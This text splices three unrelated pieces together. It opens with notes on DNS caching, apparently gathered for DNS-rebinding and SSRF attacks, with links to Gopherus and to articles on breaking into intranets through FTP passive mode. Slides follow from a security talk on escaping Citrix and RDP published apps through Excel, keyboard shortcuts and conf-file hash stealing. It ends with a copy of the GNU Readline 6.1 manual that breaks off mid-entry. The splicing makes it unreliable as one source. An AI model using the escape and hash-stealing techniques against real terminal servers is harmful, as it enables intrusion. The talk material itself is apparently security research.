1. In Java, a successful DNS lookup is cached for 30 seconds by default (the networkaddress.cache.ttl field, unset by default) and a failed one for 10 seconds. (The cache time is configured in /Library/Java/JavaVirtualMachines/jdk/Contents/Home/jre/lib/security/java.security.)
2. PHP does no caching by default.
3. Linux does not cache DNS by default; macOS and Windows do (so do not try to reproduce on macOS or Windows).
4. Some public DNS servers, such as 114.114.114.114, still cache records, but 8.8.8.8 manages its cache strictly according to the DNS protocol: if the TTL is set to 0, it does not cache.

"When TLS Hacks You" attack-chain tooling

FTP passive mode

References

https://security.tencent.com/index.php/blog/msg/179

How to break into an intranet with FTP passive mode

https://www.anquanke.com/post/id/254387

Gopherus

https://github.com/tarunkant/Gopherus
Bosses love Excel …
hackers too!
Juan Garrido “Silverhack”
Chema Alonso (@chemaalonso)
INFORMATICA64.COM
Who?
About
• Security Researchers
• Working at INFORMATICA64
• http://www.informatica64.com
What?
Terminal Applications
Why?
RDP
Citrix
Using Bing
Secure?
Verbosity
• Conf files are too verbose
–Internal IP Address
–Users & encrypted passwords
–Internal Software
–Perfect for APTs
• 0-day exploits
• Evilgrade attacks
Verbosity
Verbosity
• Attacker can:
–modify conf files
–Generate error messages
–Fingerprinting all software
• Example: C.A.C.A.
Computer Assisted Citrix Apps
Hash Stealing
• Modify the Conf file
• Run a remote app in a rogue Server
• Sniff the hash
Playing the Piano
Playing the Piano
• Too many links
–Specially running on Windows 2008
• Too many environment variables
–%SystemRoot%
–%ProgramFiles%
–%SystemDrive%
Playing the Piano
• Too many shortcuts
– Ctrl + h – Web History
– Ctrl + n – New Web Browser
– Shift + Left Click – New Web Browser
– Ctrl + o – Internet Address
– Ctrl + p – Print
– Right Click (Shift + F10)
– Save Image As
– View Source
– F1 – Jump to URL…
Playing the Piano
• Too, too, too many shortcuts:
–ALT GR+SUPR = CTRL + ALT + SUP
–CTRL + F1 = CTRL + ALT + SUP
–CTRL + F3 = TASK MANAGER
• Sticky Keys
Easy?
Paths?
Minimum Exposure Paths
• There are as many paths as
published apps
• Every app is a path that could drive
to elevate privileges
• Complex tools are better candidates
• Excel is a complex tool
Excel as a Path
• Office Apps are complex
• Too many security policies
–Necessary to download extra GPOs
• Too many systems by default
–No Security GPOs
–Allowing non-signed Macros
–Allowing third-part-signed macros
–Allowing CA to be added
Excel 1
Software Restriction Policies
• Forbidden apps
–Via hash
–Via path
• App Locker
–Using Digital Certificates
• ACLs
Software Restriction Policies
• Too many consoles
–Cmd.exe
–Windows Management
Instrumentation
–PowerShell
• Even consoles from other OS
–ReactOS
Excel 2
Risky?
Start the III World War
• Find a bug in a DHS Computer
• Getting to the OS
• Sign an excel file with a rogue CA
• Generate an attacking URL in the
CRL to attack… China
• Send a digitally-signed excel file…
Just
kidding
Contact information
• Juan Garrido “Silverhack”
–[email protected]
• Chema Alonso
–[email protected]
–@chemaalonso
• http://www.informatica64.com | pdf |
GNU Readline Library
Edition 6.1, for Readline Library Version 6.1.
October 2009
Chet Ramey, Case Western Reserve University
Brian Fox, Free Software Foundation
This manual describes the GNU Readline Library (version 6.1, 9 October 2009), a library
which aids in the consistency of user interface across discrete programs which provide a
command line interface.
Copyright © 1988–2009 Free Software Foundation, Inc.
Permission is granted to make and distribute verbatim copies of this manual provided the
copyright notice and this permission notice are preserved on all copies.
Permission is granted to copy, distribute and/or modify this document under
the terms of the GNU Free Documentation License, Version 1.3 or any later
version published by the Free Software Foundation; with no Invariant Sections,
with the Front-Cover texts being “A GNU Manual”, and with the Back-Cover
Texts as in (a) below. A copy of the license is included in the section entitled
“GNU Free Documentation License”.
(a) The FSF’s Back-Cover Text is: You are free to copy and modify this GNU
manual. Buying copies from GNU Press supports the FSF in developing GNU
and promoting software freedom.”
Published by the Free Software Foundation
59 Temple Place, Suite 330,
Boston, MA 02111-1307
USA
Table of Contents
1
Command Line Editing . . . . . . . . . . . . . . . . . . . . . . . . 1
1.1
Introduction to Line Editing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2
Readline Interaction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2.1
Readline Bare Essentials. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2.2
Readline Movement Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2.3
Readline Killing Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2.4
Readline Arguments. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2.5
Searching for Commands in the History. . . . . . . . . . . . . . . . . . . . 3
1.3
Readline Init File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3.1
Readline Init File Syntax . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.3.2
Conditional Init Constructs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
1.3.3
Sample Init File. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
1.4
Bindable Readline Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.1
Commands For Moving. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.2
Commands For Manipulating The History . . . . . . . . . . . . . . . . 13
1.4.3
Commands For Changing Text . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.4.4
Killing And Yanking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1.4.5
Specifying Numeric Arguments . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.6
Letting Readline Type For You. . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.7
Keyboard Macros . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.4.8
Some Miscellaneous Commands . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.5
Readline vi Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2
Programming with GNU Readline. . . . . . . . . . . 20
2.1
Basic Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.2
Custom Functions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.2.1
Readline Typedefs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2.2
Writing a New Function . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.3
Readline Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.4
Readline Convenience Functions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
2.4.1
Naming a Function. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
2.4.2
Selecting a Keymap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
2.4.3
Binding Keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.4.4
Associating Function Names and Bindings . . . . . . . . . . . . . . . . 30
2.4.5
Allowing Undoing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
2.4.6
Redisplay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.4.7
Modifying Text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4.8
Character Input. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
2.4.9
Terminal Management. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
2.4.10
Utility Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
2.4.11
Miscellaneous Functions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
2.4.12
Alternate Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
2.4.13
A Readline Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
2.5
Readline Signal Handling. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
2.6
Custom Completers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.6.1
How Completing Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
2.6.2
Completion Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
2.6.3
Completion Variables. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
2.6.4
A Short Completion Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Appendix A
GNU Free Documentation License
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
Concept Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Function and Variable Index . . . . . . . . . . . . . . . . . . . . . 65
Chapter 1: Command Line Editing
1
1 Command Line Editing
This chapter describes the basic features of the gnu command line editing interface.
1.1 Introduction to Line Editing
The following paragraphs describe the notation used to represent keystrokes.
The text C-k is read as ‘Control-K’ and describes the character produced when the k
key is pressed while the Control key is depressed.
The text M-k is read as ‘Meta-K’ and describes the character produced when the Meta
key (if you have one) is depressed, and the k key is pressed. The Meta key is labeled ALT
on many keyboards. On keyboards with two keys labeled ALT (usually to either side of the
space bar), the ALT on the left side is generally set to work as a Meta key. The ALT key on
the right may also be configured to work as a Meta key or may be configured as some other
modifier, such as a Compose key for typing accented characters.
If you do not have a Meta or ALT key, or another key working as a Meta key, the identical
keystroke can be generated by typing ESC first, and then typing k. Either process is known
as metafying the k key.
The text M-C-k is read as ‘Meta-Control-k’ and describes the character produced by
metafying C-k.
In addition, several keys have their own names. Specifically, DEL, ESC, LFD, SPC, RET,
and TAB all stand for themselves when seen in this text, or in an init file (see Section 1.3
[Readline Init File], page 4). If your keyboard lacks a LFD key, typing C-j will produce the
desired character. The RET key may be labeled Return or Enter on some keyboards.
1.2 Readline Interaction
Often during an interactive session you type in a long line of text, only to notice that the
first word on the line is misspelled. The Readline library gives you a set of commands for
manipulating the text as you type it in, allowing you to just fix your typo, and not forcing
you to retype the majority of the line. Using these editing commands, you move the cursor
to the place that needs correction, and delete or insert the text of the corrections. Then,
when you are satisfied with the line, you simply press RET. You do not have to be at the end
of the line to press RET; the entire line is accepted regardless of the location of the cursor
within the line.
1.2.1 Readline Bare Essentials
In order to enter characters into the line, simply type them. The typed character appears
where the cursor was, and then the cursor moves one space to the right. If you mistype a
character, you can use your erase character to back up and delete the mistyped character.
Sometimes you may mistype a character, and not notice the error until you have typed
several other characters. In that case, you can type C-b to move the cursor to the left, and
then correct your mistake. Afterwards, you can move the cursor to the right with C-f.
When you add text in the middle of a line, you will notice that characters to the right
of the cursor are ‘pushed over’ to make room for the text that you have inserted. Likewise,
when you delete text behind the cursor, characters to the right of the cursor are ‘pulled
back’ to fill in the blank space created by the removal of the text. A list of the bare essentials
for editing the text of an input line follows.
C-b
Move back one character.
C-f
Move forward one character.
DEL or Backspace
Delete the character to the left of the cursor.
C-d
Delete the character underneath the cursor.
Printing characters
Insert the character into the line at the cursor.
C-_ or C-x C-u
Undo the last editing command. You can undo all the way back to an empty
line.
(Depending on your configuration, the Backspace key may be set to delete the character to the
left of the cursor and the DEL key set to delete the character underneath the cursor, like
C-d, rather than the character to the left of the cursor.)
1.2.2 Readline Movement Commands
The above table describes the most basic keystrokes that you need in order to do editing of
the input line. For your convenience, many other commands have been added in addition
to C-b, C-f, C-d, and DEL. Here are some commands for moving more rapidly about the
line.
C-a
Move to the start of the line.
C-e
Move to the end of the line.
M-f
Move forward a word, where a word is composed of letters and digits.
M-b
Move backward a word.
C-l
Clear the screen, reprinting the current line at the top.
Notice how C-f moves forward a character, while M-f moves forward a word. It is a loose
convention that control keystrokes operate on characters while meta keystrokes operate on
words.
1.2.3 Readline Killing Commands
Killing text means to delete the text from the line, but to save it away for later use, usually
by yanking (re-inserting) it back into the line. (‘Cut’ and ‘paste’ are more recent jargon for
‘kill’ and ‘yank’.)
If the description for a command says that it ‘kills’ text, then you can be sure that you
can get the text back in a different (or the same) place later.
When you use a kill command, the text is saved in a kill-ring. Any number of consecutive
kills save all of the killed text together, so that when you yank it back, you get it all. The
kill ring is not line specific; the text that you killed on a previously typed line is available
to be yanked back later, when you are typing another line.
Here is the list of commands for killing text.
C-k
Kill the text from the current cursor position to the end of the line.
M-d
Kill from the cursor to the end of the current word, or, if between words, to the
end of the next word. Word boundaries are the same as those used by M-f.
M-DEL
Kill from the cursor the start of the current word, or, if between words, to the
start of the previous word. Word boundaries are the same as those used by
M-b.
C-w
Kill from the cursor to the previous whitespace. This is different than M-DEL
because the word boundaries differ.
Here is how to yank the text back into the line.
Yanking means to copy the most-
recently-killed text from the kill buffer.
C-y
Yank the most recently killed text back into the buffer at the cursor.
M-y
Rotate the kill-ring, and yank the new top. You can only do this if the prior
command is C-y or M-y.
1.2.4 Readline Arguments
You can pass numeric arguments to Readline commands. Sometimes the argument acts
as a repeat count, other times it is the sign of the argument that is significant. If you
pass a negative argument to a command which normally acts in a forward direction, that
command will act in a backward direction. For example, to kill text back to the start of
the line, you might type ‘M-- C-k’.
The general way to pass numeric arguments to a command is to type meta digits before
the command. If the first ‘digit’ typed is a minus sign (‘-’), then the sign of the argument
will be negative. Once you have typed one meta digit to get the argument started, you
can type the remainder of the digits, and then the command. For example, to give the C-d
command an argument of 10, you could type ‘M-1 0 C-d’, which will delete the next ten
characters on the input line.
1.2.5 Searching for Commands in the History
Readline provides commands for searching through the command history for lines containing
a specified string. There are two search modes: incremental and non-incremental.
Incremental searches begin before the user has finished typing the search string. As each
character of the search string is typed, Readline displays the next entry from the history
matching the string typed so far. An incremental search requires only as many characters as
needed to find the desired history entry. To search backward in the history for a particular
string, type C-r. Typing C-s searches forward through the history. The characters present
in the value of the isearch-terminators variable are used to terminate an incremental
search. If that variable has not been assigned a value, the ESC and C-J characters will
terminate an incremental search.
C-g will abort an incremental search and restore the
original line. When the search is terminated, the history entry containing the search string
becomes the current line.
To find other matching entries in the history list, type C-r or C-s as appropriate. This
will search backward or forward in the history for the next entry matching the search string
typed so far. Any other key sequence bound to a Readline command will terminate the
search and execute that command. For instance, a RET will terminate the search and accept
the line, thereby executing the command from the history list. A movement command will
terminate the search, make the last line found the current line, and begin editing.
Readline remembers the last incremental search string. If two C-rs are typed without
any intervening characters defining a new search string, any remembered search string is
used.
Non-incremental searches read the entire search string before starting to search for
matching history lines.
The search string may be typed by the user or be part of the
contents of the current line.
1.3 Readline Init File
Although the Readline library comes with a set of Emacs-like keybindings installed by
default, it is possible to use a different set of keybindings. Any user can customize programs
that use Readline by putting commands in an inputrc file, conventionally in his home
directory. The name of this file is taken from the value of the environment variable INPUTRC.
If that variable is unset, the default is ‘~/.inputrc’. If that file does not exist or cannot
be read, the ultimate default is ‘/etc/inputrc’.
When a program which uses the Readline library starts up, the init file is read, and the
key bindings are set.
In addition, the C-x C-r command re-reads this init file, thus incorporating any changes
that you might have made to it.
1.3.1 Readline Init File Syntax
There are only a few basic constructs allowed in the Readline init file. Blank lines are
ignored. Lines beginning with a ‘#’ are comments. Lines beginning with a ‘$’ indicate
conditional constructs (see Section 1.3.2 [Conditional Init Constructs], page 10).
Other
lines denote variable settings and key bindings.
Variable Settings
You can modify the run-time behavior of Readline by altering the values of
variables in Readline using the set command within the init file. The syntax
is simple:
set variable value
Here, for example, is how to change from the default Emacs-like key binding to
use vi line editing commands:
set editing-mode vi
Variable names and values, where appropriate, are recognized without regard
to case. Unrecognized variable names are ignored.
Boolean variables (those that can be set to on or off) are set to on if the value is
null or empty, on (case-insensitive), or 1. Any other value results in the variable
being set to off.
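For example, a small inputrc fragment combining these constructs (the variable names are taken from the list that follows) might read:

```
# comments start with '#'
set editing-mode vi
set completion-ignore-case on
set bell-style visible
```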
A great deal of run-time behavior is changeable with the following variables.
bell-style
Controls what happens when Readline wants to ring the termi-
nal bell. If set to ‘none’, Readline never rings the bell. If set to
‘visible’, Readline uses a visible bell if one is available. If set to
‘audible’ (the default), Readline attempts to ring the terminal’s
bell.
bind-tty-special-chars
If set to ‘on’, Readline attempts to bind the control characters
treated specially by the kernel’s terminal driver to their Readline
equivalents.
comment-begin
The string to insert at the beginning of the line when the insert-
comment command is executed. The default value is "#".
completion-ignore-case
If set to ‘on’, Readline performs filename matching and completion
in a case-insensitive fashion. The default value is ‘off’.
completion-prefix-display-length
The length in characters of the common prefix of a list of possible
completions that is displayed without modification. When set to a
value greater than zero, common prefixes longer than this value are
replaced with an ellipsis when displaying possible completions.
completion-query-items
The number of possible completions that determines when the user
is asked whether the list of possibilities should be displayed. If the
number of possible completions is greater than this value, Readline
will ask the user whether or not he wishes to view them; otherwise,
they are simply listed. This variable must be set to an integer value
greater than or equal to 0. A negative value means Readline should
never ask. The default limit is 100.
convert-meta
If set to ‘on’, Readline will convert characters with the eighth bit set
to an ascii key sequence by stripping the eighth bit and prefixing
an ESC character, converting them to a meta-prefixed key sequence.
The default value is ‘on’.
disable-completion
If set to ‘On’, Readline will inhibit word completion. Completion
characters will be inserted into the line as if they had been mapped
to self-insert. The default is ‘off’.
editing-mode
The editing-mode variable controls which default set of key bind-
ings is used. By default, Readline starts up in Emacs editing mode,
where the keystrokes are most similar to Emacs. This variable can
be set to either ‘emacs’ or ‘vi’.
echo-control-characters
When set to ‘on’, on operating systems that indicate they support
it, readline echoes a character corresponding to a signal generated
from the keyboard. The default is ‘on’.
enable-keypad
When set to ‘on’, Readline will try to enable the application keypad
when it is called. Some systems need this to enable the arrow keys.
The default is ‘off’.
enable-meta-key
When set to ‘on’, Readline will try to enable any meta modifier
key the terminal claims to support when it is called.
On many
terminals, the meta key is used to send eight-bit characters. The
default is ‘on’.
expand-tilde
If set to ‘on’, tilde expansion is performed when Readline attempts
word completion. The default is ‘off’.
history-preserve-point
If set to ‘on’, the history code attempts to place the point (the
current cursor position) at the same location on each history line
retrieved with previous-history or next-history. The default
is ‘off’.
history-size
Set the maximum number of history entries saved in the history
list. If set to zero, the number of entries in the history list is not
limited.
horizontal-scroll-mode
This variable can be set to either ‘on’ or ‘off’. Setting it to ‘on’
means that the text of the lines being edited will scroll horizontally
on a single screen line when they are longer than the width of the
screen, instead of wrapping onto a new screen line. By default, this
variable is set to ‘off’.
input-meta
If set to ‘on’, Readline will enable eight-bit input (it will not clear
the eighth bit in the characters it reads), regardless of what the
terminal claims it can support. The default value is ‘off’. The
name meta-flag is a synonym for this variable.
isearch-terminators
The string of characters that should terminate an incremental
search without subsequently executing the character as a command
(see Section 1.2.5 [Searching], page 3).
If this variable has not
been given a value, the characters ESC and C-J will terminate an
incremental search.
keymap
Sets Readline’s idea of the current keymap for key binding com-
mands.
Acceptable keymap names are emacs, emacs-standard, emacs-meta,
emacs-ctlx, vi, vi-move, vi-command, and vi-insert. vi is
equivalent to vi-command; emacs is equivalent
to emacs-standard. The default value is emacs. The value of the
editing-mode variable also affects the default keymap.
mark-directories
If set to ‘on’, completed directory names have a slash appended.
The default is ‘on’.
mark-modified-lines
This variable, when set to ‘on’, causes Readline to display an as-
terisk (‘*’) at the start of history lines which have been modified.
This variable is ‘off’ by default.
mark-symlinked-directories
If set to ‘on’, completed names which are symbolic links to di-
rectories have a slash appended (subject to the value of mark-
directories). The default is ‘off’.
match-hidden-files
This variable, when set to ‘on’, causes Readline to match files whose
names begin with a ‘.’ (hidden files) when performing filename
completion, unless the leading ‘.’ is supplied by the user in the
filename to be completed. This variable is ‘on’ by default.
output-meta
If set to ‘on’, Readline will display characters with the eighth bit
set directly rather than as a meta-prefixed escape sequence. The
default is ‘off’.
page-completions
If set to ‘on’, Readline uses an internal more-like pager to display
a screenful of possible completions at a time. This variable is ‘on’
by default.
print-completions-horizontally
If set to ‘on’, Readline will display completions with matches sorted
horizontally in alphabetical order, rather than down the screen.
The default is ‘off’.
revert-all-at-newline
If set to ‘on’, Readline will undo all changes to history lines before
returning when accept-line is executed. By default, history lines
may be modified and retain individual undo lists across calls to
readline. The default is ‘off’.
show-all-if-ambiguous
This alters the default behavior of the completion functions. If set
to ‘on’, words which have more than one possible completion cause
the matches to be listed immediately instead of ringing the bell.
The default value is ‘off’.
show-all-if-unmodified
This alters the default behavior of the completion functions in a
fashion similar to show-all-if-ambiguous. If set to ‘on’, words which
have more than one possible completion without any possible par-
tial completion (the possible completions don’t share a common
prefix) cause the matches to be listed immediately instead of ring-
ing the bell. The default value is ‘off’.
skip-completed-text
If set to ‘on’, this alters the default completion behavior when in-
serting a single match into the line. It’s only active when perform-
ing completion in the middle of a word. If enabled, readline does
not insert characters from the completion that match characters
after point in the word being completed, so portions of the word
following the cursor are not duplicated. For instance, if this is en-
abled, attempting completion when the cursor is after the ‘e’ in
‘Makefile’ will result in ‘Makefile’ rather than ‘Makefilefile’,
assuming there is a single possible completion. The default value
is ‘off’.
visible-stats
If set to ‘on’, a character denoting a file’s type is appended to the
filename when listing possible completions. The default is ‘off’.
Key Bindings
The syntax for controlling key bindings in the init file is simple.
First you
need to find the name of the command that you want to change. The following
sections contain tables of the command name, the default keybinding, if any,
and a short description of what the command does.
Once you know the name of the command, simply place on a line in the init
file the name of the key you wish to bind the command to, a colon, and then
the name of the command. There can be no space between the key name and
the colon – that will be interpreted as part of the key name. The name of
the key can be expressed in different ways, depending on what you find most
comfortable.
In addition to command names, readline allows keys to be bound to a string
that is inserted when the key is pressed (a macro).
keyname: function-name or macro
keyname is the name of a key spelled out in English. For example:
Control-u: universal-argument
Meta-Rubout: backward-kill-word
Control-o: "> output"
In the above example, C-u is bound to the function universal-
argument, M-DEL is bound to the function backward-kill-word,
and C-o is bound to run the macro expressed on the right hand
side (that is, to insert the text ‘> output’ into the line).
A number of symbolic character names are recognized while pro-
cessing this key binding syntax: DEL, ESC, ESCAPE, LFD, NEW-
LINE, RET, RETURN, RUBOUT, SPACE, SPC, and TAB.
"keyseq": function-name or macro
keyseq differs from keyname above in that strings denoting an en-
tire key sequence can be specified, by placing the key sequence in
double quotes. Some gnu Emacs style key escapes can be used, as
in the following example, but the special character names are not
recognized.
"\C-u": universal-argument
"\C-x\C-r": re-read-init-file
"\e[11~": "Function Key 1"
In the above example, C-u is again bound to the function
universal-argument (just as it was in the first example), ‘C-x
C-r’ is bound to the function re-read-init-file, and ‘ESC [ 1 1
~’ is bound to insert the text ‘Function Key 1’.
The following gnu Emacs style escape sequences are available when specifying
key sequences:
\C-          control prefix
\M-          meta prefix
\e           an escape character
\\           backslash
\"           ", a double quotation mark
\’           ’, a single quote or apostrophe
In addition to the gnu Emacs style escape sequences, a second set of backslash
escapes is available:
\a           alert (bell)
\b           backspace
\d           delete
\f           form feed
\n           newline
\r           carriage return
\t           horizontal tab
\v           vertical tab
\nnn         the eight-bit character whose value is the octal value nnn (one to
             three digits)
\xHH         the eight-bit character whose value is the hexadecimal value HH
             (one or two hex digits)
When entering the text of a macro, single or double quotes must be used to
indicate a macro definition. Unquoted text is assumed to be a function name. In
the macro body, the backslash escapes described above are expanded. Backslash
will quote any other character in the macro text, including ‘"’ and ‘’’. For
example, the following binding will make ‘C-x \’ insert a single ‘\’ into the line:
"\C-x\\": "\\"
1.3.2 Conditional Init Constructs
Readline implements a facility similar in spirit to the conditional compilation features of
the C preprocessor which allows key bindings and variable settings to be performed as the
result of tests. There are four parser directives used.
$if
The $if construct allows bindings to be made based on the editing mode, the
terminal being used, or the application using Readline. The text of the test
extends to the end of the line; no characters are required to isolate it.
mode
The mode= form of the $if directive is used to test whether Readline
is in emacs or vi mode. This may be used in conjunction with the
‘set keymap’ command, for instance, to set bindings in the emacs-
standard and emacs-ctlx keymaps only if Readline is starting out
in emacs mode.
term
The term= form may be used to include terminal-specific key bind-
ings, perhaps to bind the key sequences output by the terminal’s
function keys. The word on the right side of the ‘=’ is tested against
both the full name of the terminal and the portion of the terminal
name before the first ‘-’. This allows sun to match both sun and
sun-cmd, for instance.
application
The application construct is used to include application-specific set-
tings. Each program using the Readline library sets the application
name, and you can test for a particular value. This could be used to
bind key sequences to functions useful for a specific program. For
instance, the following command adds a key sequence that quotes
the current or previous word in Bash:
$if Bash
# Quote the current or previous word
"\C-xq": "\eb\"\ef\""
$endif
$endif
This command, as seen in the previous example, terminates an $if command.
$else
Commands in this branch of the $if directive are executed if the test fails.
$include
This directive takes a single filename as an argument and reads commands
and bindings from that file. For example, the following directive reads from
‘/etc/inputrc’:
$include /etc/inputrc
1.3.3 Sample Init File
Here is an example of an inputrc file. This illustrates key binding, variable assignment, and
conditional syntax.
# This file controls the behaviour of line input editing for
# programs that use the GNU Readline library.  Existing
# programs include FTP, Bash, and GDB.
#
# You can re-read the inputrc file with C-x C-r.
# Lines beginning with ’#’ are comments.
#
# First, include any systemwide bindings and variable
# assignments from /etc/Inputrc
$include /etc/Inputrc
#
# Set various bindings for emacs mode.
set editing-mode emacs
$if mode=emacs
Meta-Control-h:	backward-kill-word	Text after the function name is ignored
#
# Arrow keys in keypad mode
#
#"\M-OD":        backward-char
#"\M-OC":        forward-char
#"\M-OA":        previous-history
#"\M-OB":        next-history
#
# Arrow keys in ANSI mode
#
"\M-[D":        backward-char
"\M-[C":        forward-char
"\M-[A":        previous-history
"\M-[B":        next-history
#
# Arrow keys in 8 bit keypad mode
#
#"\M-\C-OD":     backward-char
#"\M-\C-OC":     forward-char
#"\M-\C-OA":     previous-history
#"\M-\C-OB":     next-history
#
# Arrow keys in 8 bit ANSI mode
#
#"\M-\C-[D":     backward-char
#"\M-\C-[C":     forward-char
#"\M-\C-[A":     previous-history
#"\M-\C-[B":     next-history
C-q: quoted-insert
$endif
# An old-style binding.  This happens to be the default.
TAB: complete
# Macros that are convenient for shell interaction
$if Bash
# edit the path
"\C-xp": "PATH=${PATH}\e\C-e\C-a\ef\C-f"
# prepare to type a quoted word --
# insert open and close double quotes
# and move to just after the open quote
"\C-x\"": "\"\"\C-b"
# insert a backslash (testing backslash escapes
# in sequences and macros)
"\C-x\\": "\\"
# Quote the current or previous word
"\C-xq": "\eb\"\ef\""
# Add a binding to refresh the line, which is unbound
"\C-xr": redraw-current-line
# Edit variable on current line.
"\M-\C-v": "\C-a\C-k$\C-y\M-\C-e\C-a\C-y="
$endif
# use a visible bell if one is available
set bell-style visible
# don’t strip characters to 7 bits when reading
set input-meta on
# allow iso-latin1 characters to be inserted rather
# than converted to prefix-meta sequences
set convert-meta off
# display characters with the eighth bit set directly
# rather than as meta-prefixed characters
set output-meta on
# if there are more than 150 possible completions for
# a word, ask the user if he wants to see all of them
set completion-query-items 150
# For FTP
$if Ftp
"\C-xg": "get \M-?"
"\C-xt": "put \M-?"
"\M-.": yank-last-arg
$endif
1.4 Bindable Readline Commands
This section describes Readline commands that may be bound to key sequences. Command
names without an accompanying key sequence are unbound by default.
In the following descriptions, point refers to the current cursor position, and mark refers
to a cursor position saved by the set-mark command. The text between the point and
mark is referred to as the region.
1.4.1 Commands For Moving
beginning-of-line (C-a)
Move to the start of the current line.
end-of-line (C-e)
Move to the end of the line.
forward-char (C-f)
Move forward a character.
backward-char (C-b)
Move back a character.
forward-word (M-f)
Move forward to the end of the next word. Words are composed of letters and
digits.
backward-word (M-b)
Move back to the start of the current or previous word. Words are composed
of letters and digits.
clear-screen (C-l)
Clear the screen and redraw the current line, leaving the current line at the top
of the screen.
redraw-current-line ()
Refresh the current line. By default, this is unbound.
1.4.2 Commands For Manipulating The History
accept-line (Newline or Return)
Accept the line regardless of where the cursor is. If this line is non-empty, it
may be added to the history list for future recall with add_history(). If this
line is a modified history line, the history line is restored to its original state.
previous-history (C-p)
Move ‘back’ through the history list, fetching the previous command.
next-history (C-n)
Move ‘forward’ through the history list, fetching the next command.
beginning-of-history (M-<)
Move to the first line in the history.
end-of-history (M->)
Move to the end of the input history, i.e., the line currently being entered.
reverse-search-history (C-r)
Search backward starting at the current line and moving ‘up’ through the his-
tory as necessary. This is an incremental search.
forward-search-history (C-s)
Search forward starting at the current line and moving ‘down’ through the
history as necessary. This is an incremental search.
non-incremental-reverse-search-history (M-p)
Search backward starting at the current line and moving ‘up’ through the his-
tory as necessary using a non-incremental search for a string supplied by the
user.
non-incremental-forward-search-history (M-n)
Search forward starting at the current line and moving ‘down’ through the
history as necessary using a non-incremental search for a string supplied by the
user.
history-search-forward ()
Search forward through the history for the string of characters between the
start of the current line and the point. This is a non-incremental search. By
default, this command is unbound.
history-search-backward ()
Search backward through the history for the string of characters between the
start of the current line and the point. This is a non-incremental search. By
default, this command is unbound.
yank-nth-arg (M-C-y)
Insert the first argument to the previous command (usually the second word
on the previous line) at point. With an argument n, insert the nth word from
the previous command (the words in the previous command begin with word
0). A negative argument inserts the nth word from the end of the previous
command. Once the argument n is computed, the argument is extracted as if
the ‘!n’ history expansion had been specified.
yank-last-arg (M-. or M-_)
Insert last argument to the previous command (the last word of the previous
history entry). With an argument, behave exactly like yank-nth-arg. Succes-
sive calls to yank-last-arg move back through the history list, inserting the
last argument of each line in turn. The history expansion facilities are used to
extract the last argument, as if the ‘!$’ history expansion had been specified.
1.4.3 Commands For Changing Text
delete-char (C-d)
Delete the character at point. If point is at the beginning of the line, there
are no characters in the line, and the last character typed was not bound to
delete-char, then return eof.
backward-delete-char (Rubout)
Delete the character behind the cursor. A numeric argument means to kill the
characters instead of deleting them.
forward-backward-delete-char ()
Delete the character under the cursor, unless the cursor is at the end of the
line, in which case the character behind the cursor is deleted. By default, this
is not bound to a key.
quoted-insert (C-q or C-v)
Add the next character typed to the line verbatim. This is how to insert key
sequences like C-q, for example.
tab-insert (M-TAB)
Insert a tab character.
self-insert (a, b, A, 1, !, ...)
